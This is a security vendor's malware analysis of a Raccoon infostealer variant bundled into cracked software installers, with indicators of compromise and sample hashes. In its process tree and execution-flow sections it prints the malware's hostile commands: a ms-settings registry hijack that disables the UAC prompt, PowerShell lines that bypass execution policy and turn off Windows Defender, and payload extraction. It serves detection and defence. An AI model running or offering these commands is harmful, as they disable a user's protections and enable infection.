Conhost.exe Forcev1: New Raccoon Malware You Should Know

conhost.exe 0xffffffff -ForceV1: The one that got away

Amidst an expanding background of emerging COVID-19 cyber threats, the ReasonLabs research team discovered and reported on a new variant of the Raccoon malware family. Initially discovered back in 2019, conhost.exe 0xffffffff -ForceV1 is a new variant of the raccoon malware family, designed to steal user data from browsers. In this article, we analyze this new variant, its attack methods, and disguise techniques.

conhost.exe 0xffffffff -ForceV1: What do we know?

Here’s what we know so far:

  • The new variant masquerades itself as legit, known program installers.
  • The new malware sample flew under the AV radar and there were only three minimal detections on VirusTotal over two weeks ago.
  • This Trojan horse comes from the family of Raccoon malware.
  • This Trojan is designed to steal user data from about 60 browsers. It is capable of taking screenshots from the victim machine and capturing input.

The first versions seen in the wild were written in C++, but a year has gone by and the malware authors have since developed new versions written in Borland Delphi, apparently to make it harder to detect and analyze. The malware comes inside an Inno Setup installer that is responsible for installing both the original program and the malware.

Execution flow of the Trojan installation

The InnoSetup script file runs regular installation and extracts the malware.

The samples we obtained imitate benign program installers (I.e. Bandicam, Revo Uninstaller) but hide a Trojan inside them. The installation of the original programs (which are usually cracked versions of programs that have a paid version, so the user knows the installation is not from the original site) will proceed as usual, so the user will not suspect that something suspicious happened. The execution flow of the Trojan installation is very apparent, with alerting command lines and the execution of PowerShell and VBScript, which should have raised alarm bells in all of the security products. However, for some reason, the samples we caught had only three minimal detections on VirusTotal (and as of May 6th, 2020 even 0 detections!). The samples were uploaded to VirusTotal more than two weeks ago.

The malware will disable Windows Defender using PowerShell, use VBS to unpack executables from a password protected zip file contained in the installer, and change the registry to disable the admin approval prompt. 

The sophisticated network communication remains the same as it was in the first versions: web requests to Google docs (or GitHub) in order to acquire the malware’s CNC IP address. That way the address is not hardcoded in the sample. The first stage is to filter the CNC address from the response and then send base64 encoded params (decodes to bot_id=59407D34-C8C5-44DF-A766-BA8A11CB1CB0_Shayne&config_id=654d0d2e43e786a31eb3ea9dc114b4d91d2014d0&data=null) to “gate/log.php”.

Connections

PID

Process

IP

ASN

CN

Reputation

1440

sn.exe

172.217.16.174:443

Google Inc.

US

whitelisted

1440

sn.exe

216.58.208.33:443

Google Inc.

US

whitelisted

1440

sn.exe

34.65.6.73:80

US

malicious

DNS requests

Domain

IP

Reputation

drive.google.com

172.217.16.174

shared

doc-08-6g-docs.googleusercontent.com

216.58.208.33

whitelisted

Process tree (the malicious part):

  • cmd.exe (PID: 4204 cmdline: C:\Windows\system32\cmd.exe /c ”C:\ProgramData\uacb.cmd’ )
    • conhost.exe (PID: 3888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
    • reg.exe (PID: 1364 cmdline: REG ADD ‘HKCU\SOFTWARE\Classes\ms-settings\shell\open\command’ /t REG_SZ /d ‘C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f’ /f)
    • reg.exe (PID: 5468 cmdline: REG ADD ‘hkcu\software\classes\ms-settings\shell\open\command’ /v DelegateExecute /t REG_SZ /d ‘ ‘ /f)
  • cmd.exe (PID: 3968 cmdline: C:\Windows\system32\cmd.exe /c ”C:\ProgramData\cloudb.cmd’ ‘)
    • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
    • powershell.exe (PID: 3132 cmdline: PowerShell Set-ExecutionPolicy -ExecutionPolicy Bypass -Force)
    • powershell.exe (PID: 5480 cmdline: PowerShell Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIOAVProtection 1 -MAPSReporting Disabled -SubmitSamplesConsent NeverSend)
  • wscript.exe (PID: 5264 cmdline: ‘C:\Windows\System32\WScript.exe’ ‘C:\ProgramData\runner.vbs’)
    • cmd.exe (PID: 5336 cmdline: C:\Windows\system32\cmd.exe /c ”C:\ProgramData\7z.cmd’ ‘)
      • conhost.exe (PID: 5404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
      • 7za.exe (PID: 5432 cmdline: ‘7za.exe’ x data.zip -pwvYhE9sFeUuqndPK -oC:\ProgramData)
      • sn.exe (PID: 5560 cmdline: sn.exe )
        • sn.exe (PID: 5840 cmdline: {path} )

The installer

sn.exe file inside data.zip in the installer.

The files contained in the installer.

Extraction of sn.exe from a password protected zip file.

Whole installation script.

IOCs:

*docs.googleusercontent.com

ip.of.cn.c/gate/log.php

Execution flow of: 

\cmd.exe /c ”C:\ProgramData\uacb.cmd’ 

    •  REG ADD ‘HKCU\SOFTWARE\Classes\ms-settings\shell\open\command’ /t REG_SZ /d ‘C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f’ /f
    • REG ADD ‘hkcu\software\classes\ms-settings\shell\open\command’ /v DelegateExecute /t REG_SZ /d ‘ ‘ /f
    • cmd.exe /c ”C:\ProgramData\cloudb.cmd’ 
    • PowerShell Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIOAVProtection 1 -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    • WScript.exe’ ‘C:\ProgramData\runner.vbs’
    • cmd.exe /c ”C:\ProgramData\7z.cmd’ 
    •  ‘7za.exe’ x data.zip -pwvYhE9sFeUuqndPK -oC:\ProgramData
    •  sn.exe

SHA256 of whole samples (not the dropped samples):

4187a452dfce94ae6aac47b015336de12419a7c99746e8d00de62fdbbfc61d98

4ad85cc8d9ee1fb2738d51083e153b8445b15c284b222ab5daa404cff63080ff

C0295b29edf694d56d82df4d8628bc97839c656f6f1e8a1f50660e32d59b1949

4c451b1881d6eaf9d192c8b5bf1b79d2e28265eef11b7d02c54939e7fe310e8b

0bf2cd7594ad46c8a01ab79f862eeeba8f6a03e087f3ae4fb256e90535e605ff

59fb625ddd27fe45cba0235046be23f6746ece3c9cd0f68acafc180b9c1404c2

About ReasonLabs

ReasonLabs plays a leading role in advancing the state of cybersecurity intelligence. We collect raw data about existing and emerging threats from always-on active sensors and then continuously analyze, organize, and add context to evolving cyber activities and attacks in order to deliver actionable insights in real time. This powerful intelligence network leaves Reason prepared to meet threats head-on.

For more information, visit www.reasonlabs.com